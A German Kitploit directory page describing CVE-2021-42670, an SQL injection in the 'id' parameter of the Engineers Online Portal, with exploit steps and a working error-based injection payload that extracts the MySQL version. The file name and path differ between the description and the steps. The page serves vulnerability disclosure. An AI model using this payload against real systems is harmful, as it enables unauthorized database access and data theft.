Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-42670 — CVE-2021-42670 – SQL-Injection-Schwachstelle im Online-Portal-System der Ingenieure. | Kitploit
Tools/GitHubGitHub/0xdeku/cve-2021-42670
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsDatenbanksicherheit
GitHub0xdeku/cve-2021-42670

CVE-2021-42670

CVE-2021-42670 – SQL-Injection-Schwachstelle im Online-Portal-System der Ingenieure.

Repository anzeigen
212vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-42670

CVE-2021-42670 - SQL-Injection-Schwachstelle im Ingenieur-Online-Portal-System.

Technische Beschreibung:

Im Engineers Online Portal besteht eine SQL-Injection-Schwachstelle. Ein Angreifer kann den anfälligen „id“-Parameter in der Webseite „announcements_student.php“ ausnutzen, um die ausgeführte SQL-Abfrage zu manipulieren. Dadurch kann der Angreifer sensible Daten vom Webserver extrahieren.

Betroffene Komponenten –

Anfällige Seite – announcements_student.php

Anfälliger Parameter – „id“

Schritte zum Ausnutzen:

  1. Navigieren Sie zu http://localhost/nia_munoz_monitoring_system/announcements_students.php
  2. Fügen Sie Ihre Payload in den id-Parameter ein

Proof of Concept (PoC) –

Die folgende Payload ermöglicht es Ihnen, die auf dem Webserver ausgeführte MySQL-Server-Version zu extrahieren:

root@kitploit:~
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

CVE-2021-42670

Referenzen –

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42670

https://nvd.nist.gov/vuln/detail/CVE-2021-42670

Entdeckt von –

Alon Leviev(0xDeku), 22. Oktober 2021.

Tool herunterladen